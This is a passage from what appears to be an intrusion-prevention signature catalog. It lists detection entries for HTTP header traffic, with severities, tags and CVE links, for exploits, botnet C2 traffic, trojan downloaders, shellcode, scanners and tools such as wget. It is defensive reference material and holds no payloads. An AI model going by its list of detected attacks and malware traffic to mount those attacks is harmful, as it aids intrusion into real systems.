About this situation: A Trend Micro Threat Discovery Appliance Remote Command Execution vulnerability
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Threat Discovery Appliance, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Trend-Micro-Threat-Discovery-Appliance-Remote-Command-Execution
Description:
Back to top

HTTP_CSH-Trojan-Downloader-Agent

About this situation: Trojan downloader Agent.chgp traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Agent.chgp, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Description:
Back to top

HTTP_CSH-Trojan-Downloader-Shexie

About this situation: Trojan downloader Shexie.A traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Shexie.A, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Description:
Back to top

HTTP_CSH-Trojan-Downloader-Vb

About this situation: Trojan Downloader VB.pnc traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, VB.pnc, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Description:
Back to top

HTTP_CSH-TSL-Attack-Tool-Detected

About this situation: TLS Attack Tool Detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Code-Injection-Attack-Tool
Description:
Back to top

HTTP_CSH-TurnitinBot-Web-Spider

About this situation: TurnitinBot web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, TurnitinBot, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Twiceler-Web-Spider

About this situation: Twiceler web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Twiceler, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Ubuntu-Advanced-Packaging-Tool

About this situation: Ubuntu Advanced Packaging Tool download detected
Context: HTTP Request Header Line
Severity: 1
Tags: Ubuntu Linux, Any Hardware, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-197-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Unidentified-Chrome-Browser-Usage

About this situation: Unidentified Chrome browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Chrome, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Unidentified-Edge-Browser-Usage

About this situation: Unidentified Edge browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Microsoft Edge, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Unidentified-Firefox-Browser-Usage

About this situation: Unidentified Firefox browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Unidentified-Safari-Browser-Usage

About this situation: Unidentified Safari browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Safari, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Unknown-Browser

About this situation: An unknown web browser or client has been detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-534-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Unusual-IP-Address-Format-Used-In-HTTP-Request

About this situation: An unusual IP address format in HTTP request detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-708-5211
Vulnerability: Unusual-IP-Address-Format-Used-In-HTTP-Request
Description:
Back to top

HTTP_CSH-Up-To-Date-Chrome-Browser-Usage

About this situation: Up-to-date Chrome browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Chrome, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1392-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Up-To-Date-Edge-Browser-Usage

About this situation: Up-to-date Edge browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Microsoft Edge, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1393-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Up-To-Date-Firefox-Browser-Usage

About this situation: Up-to-date Firefox browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1392-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Up-To-Date-Safari-Browser-Usage

About this situation: Up-to-date Safari browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Safari, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1789-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-User-Agent-Microsoft-Symbol-Server

About this situation: Microsoft-Symbol-Server User-Agent detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-1632-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-User-Agent-Processed

About this situation: HTTP User-Agent processed
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-1632-5242
Last changed: sgpkg-ips-1632-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-User-Agent-VCSoapClient

About this situation: VCSoapClient User-Agent detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-1632-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-User-Agent-Windows

About this situation: Windows User-Agent detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-1632-5242
Last changed: sgpkg-ips-1632-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-UUSee-Activity

About this situation: UUSee media client related activity
Context: HTTP Request Header Line
Severity: 1
Tags: Windows, Any Hardware, UUSee, Windows not specific, Streaming Protocols, TCP Client Traffic
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-1641-5242
Vulnerability: UUSee-Streaming-Media
Description:
Back to top

HTTP_CSH-Valve-Steam-Usage

About this situation: Detected Valve Steam usage
Context: HTTP Request Header Line
Severity: 2
Tags: Windows, Any Hardware, Valve Steam, Windows not specific, Online Gaming Protocols, TCP Client Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: Valve-Steam-Usage
Description:
Back to top

HTTP_CSH-Varnish-Cache-HTTP2-Flow-Control-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Varnish Cache detected
Context: HTTP Request Header Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Varnish Cache, CVE2024, Unix not specific, Linux not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Vulnerability: Varnish-Cache-HTTP2-Flow-Control-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Vawtrak-Botnet-Traffic

About this situation: Vawtrak botnet traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1398-5242
Vulnerability: Vawtrak-Botnet
Description:
Back to top

HTTP_CSH-Very-Long-Accept-Header

About this situation: A very long HTTP Accept header was seen
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2013, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-744-5211
Vulnerability: Ruby-On-Rails-Action-View-Mime-DOS
Description:
Back to top

HTTP_CSH-Very-Long-Cookie-Header

About this situation: A very long HTTP Cookie header was seen
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2012, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1644-5242
Vulnerability: Apache-Httpd-Error-Code-400-Httponly-Cookie-Handling-Information-Disclosure
Description:
Back to top

HTTP_CSH-ViperSoftX-C2-Traffic

About this situation: ViperSoftX command and control traffic was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1754-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: ViperSoftX-C2-Traffic
Description:
Back to top

HTTP_CSH-VMware-Vcenter-Server-Ssooverrestverifierutil-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in VMWare vCenter Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Cloud Foundation, VMware vCenter Server, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Vulnerability: VMware-Vcenter-Server-Ssooverrestverifierutil-Denial-Of-Service
Description:
Back to top

HTTP_CSH-w3af-Scan-Detect-By-User-Agent

About this situation: w3af Vulnerability Scanner
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Vulnerability: Nikto-Web-Vulnerability-Scanner
Description:
Back to top

HTTP_CSH-Waledac-Bot-Traffic

About this situation: Waledac Bot traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Waledac-Bot
Description:
Back to top

HTTP_CSH-Wavelink-Emulation-License-Server-HTTP-Header-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wavelink Emulation License Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Wavelink Emulation License Server, CVE2015, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-865-5242
Last changed: sgpkg-ips-865-5242
Vulnerability: Wavelink-Emulation-License-Server-HTTP-Header-Processing-Buffer-Overflow
Description:
Back to top

HTTP_CSH-WebCake-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-693-5211
Vulnerability: Win32.Adware.WebCake-Botnet
Description:
Back to top

HTTP_CSH-WebLog-Expert-Denial-of-Service-CVE-2018-7582

About this situation: An attempt to exploit a vulnerability in WebLog Expert Web Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, WebLog Expert, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1321-5242
Vulnerability: WebLog-Expert-Denial-of-Service-CVE-2018-7582
Description:
Back to top

HTTP_CSH-WebSocket-Connection-Request

About this situation: Client requested a Websocket connection
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-1830-5242
Description:
Back to top

HTTP_CSH-Webtrends-Security-Analyzer-Usage

About this situation: WebTrends Security Analyzer traffic detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, WebTrends, Any Operating System not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

HTTP_CSH-Western-Digital-Arkeia-Unauthenticated-Script-Upload

About this situation: An attempt to exploit a Western Digital Arkeia Unauthenticated Script Upload vulnerability detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Western Digital Arkeia, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Western-Digital-Arkeia-Unauthenticated-Script-Upload
Description:
Back to top

HTTP_CSH-Wget-Tool-Usage

About this situation: Wget command line tool usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Wget, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Wholesale-Directory-Toolbar

About this situation: Wholesale Directory Toolbar User-Agent
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Wholesale Directory Toolbar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-224-3038
Vulnerability: HTTP_Wholesale-Directory-Toolbar
Description:
Back to top

HTTP_CSH-Windfind

About this situation: WindFind traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, WindFind, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Windfind
Description:
Back to top

HTTP_CSH-Windows-HTTP.sys-DOS-Vulnerability-CVE-2013-1305

About this situation: An attempt to exploit a vulnerability in MS Windows detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, MS2013-05, CVE2013, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1528-5242
Vulnerability: Windows-HTTP.sys-DOS-Vulnerability-CVE-2013-1305
Description:
Back to top

HTTP_CSH-Windows-Media-Player-Usage

About this situation: Windows Media Player usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Windows, Any Hardware, Windows Media Player, Windows not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-Windows-Style-Absolute-Path-In-Referer-Header

About this situation: Windows style absolute path in Referer header detected
Context: HTTP Request Header Line
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-447-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: Directory-Traversal
Description:
Back to top

HTTP_CSH-Windows-WebDAV-Access

About this situation: A Windows host trying to connect into a WebDAV share has been detected
Context: HTTP Request Header Line
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-335-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Wnad

About this situation: WNAD traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, WNAD, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Wnad
Description:
Back to top

HTTP_CSH-Wordpress-Contact-Form-Entries-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Contact Form Entries Plugin detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1439-5242
Last changed: sgpkg-ips-1470-5242
Vulnerability: Wordpress-Contact-Form-Entries-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CSH-Wordpress-Limit-Login-Attempts-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Limit Login Attempts Plugin detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Wordpress-Limit-Login-Attempts-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CSH-Wordpress-PHPMailer-Host-Header-Command-Injection

About this situation: A WordPress PHPMailer Host Header Command Injection vulnerability
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Linux, Any Hardware, WordPress, CVE2016, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1017-5242
Vulnerability: Wordpress-PHPMailer-Host-Header-Command-Injection
Description:
Back to top

HTTP_CSH-Wordpress-RSS-Feed-Generator-Self_Link-HTTP_Host-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress WordPress detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1622-5242
Vulnerability: Wordpress-RSS-Feed-Generator-Self_Link-HTTP_Host-Cross-Site-Scripting
Description:
Back to top

HTTP_CSH-Wordpress-Shield-Security-Plugin-Activity-Log-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Project Shield Security Plugin detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Shield Security Plugin, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1599-5242
Last changed: sgpkg-ips-1599-5242
Vulnerability: Wordpress-Shield-Security-Plugin-Activity-Log-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CSH-Wordpress-WP-Fastest-Cache-Plugin-SQL-Injection-CVE-2023-6063

About this situation: An attempt to exploit a vulnerability in WordPress WP Fastest Cache plugin detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1659-5242
Last changed: sgpkg-ips-1706-5242
Vulnerability: Wordpress-WP-Fastest-Cache-Plugin-SQL-Injection-CVE-2023-6063
Description:
Back to top

HTTP_CSH-X86-ShellCode-Detect

About this situation: Possible X86 shellcode seen in http request header
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, x86, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-340-4219
Last changed: sgpkg-ips-1275-5242
Description:
Back to top

HTTP_CSH-Xupiter-Toolbar

About this situation: Xupiter Toolbar traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Xupiter Toolbar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Xupiter-Toolbar
Description:
Back to top

HTTP_CSH-Yahoo-MMCrawler-Web-Spider

About this situation: Yahoo! MMCrawler web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Yahoo Slurp, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-256-3038
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Yahoo-Slurp-Web-Spider

About this situation: Yahoo! Slurp web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Yahoo Slurp, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-197-2032
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Yandex-Web-Spider

About this situation: Yandex web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Yandex, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Your-Freedom-HTTP-Request

About this situation: An HTTP request to Your Freedom network detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Your Freedom, Any Operating System not specific, Tunneling Protocols, TCP Client Traffic
First detected in: sgpkg-ips-592-5211
Last changed: sgpkg-ips-592-5211
Vulnerability: Your-Freedom-Network-Usage
Description:
Back to top

HTTP_CSH-YouTube-Access

About this situation: Detects YouTube access
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Youtube, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-529-5211
Vulnerability: YouTube
Description:
Back to top

HTTP_CSH-Zango-Toolbar

About this situation: Zango toolbar in browsers User-Agent
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Zango, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-224-3038
Vulnerability: HTTP_Zango-Toolbar
Description:
Back to top

HTTP_CSH-Zbot-Traffic

About this situation: Zbot traffic to remote host detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Zeus-Zbot-Botnet
Description:
Back to top

HTTP_CSH-Zeppelin-Ransomware-Infection-Traffic

About this situation: Zeppelin ransomware infection traffic was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: Zeppelin-Ransomware-Infection-Traffic
Description:
Back to top

HTTP_CSH-ZeroAccess-Traffic

About this situation: ZeroAccess traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: ZeroAccess-Botnet
Description:
Back to top

HTTP_CSH-Zeus-Botnet-Communication-Detected

About this situation: Zeus Botnet Communication Detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Zeus-Zbot-Botnet
Description:
Back to top

HTTP_CSH-ZGrab-Network-Scanner-User-Agent

About this situation: ZGrab network scanner usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-1760-5242
Last changed: sgpkg-ips-1760-5242
Vulnerability: ZGrab-Network-Scanner
Description:
Back to top

HTTP_CSH-Zimbra-Collaboration-Memcached-Command-Injection-In-CookieCVE-2022-27924

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration detected
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2022, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1498-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Zimbra-Collaboration-Memcached-Command-Injection-CVE-2022-27924
Description: CVE References: CVE-2022-27924
Back to top

HTTP_CSH-Zloader-Malware-C2-Traffic

About this situation: Zloader malware activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zloader, Any Operating System not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: Zloader-Malware-C2-Traffic
Description:
Back to top

HTTP_CSH-ZmEu-Scanner-Usage

About this situation: ZmEu Scanner activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, ZmEu, Any Operating System not specific, Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-505-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-ZmEu-Scanner
Description:
Back to top

HTTP_CSH-Zoho-Manageengine-Desktopcentral-Authentication-Bypass-CVE-2021-44515

About this situation: An attempt to exploit a vulnerability in Zoho ManageEngine Desktop Central detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine DesktopCentral, CVE2021, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1821-5242
Last changed: sgpkg-ips-1821-5242
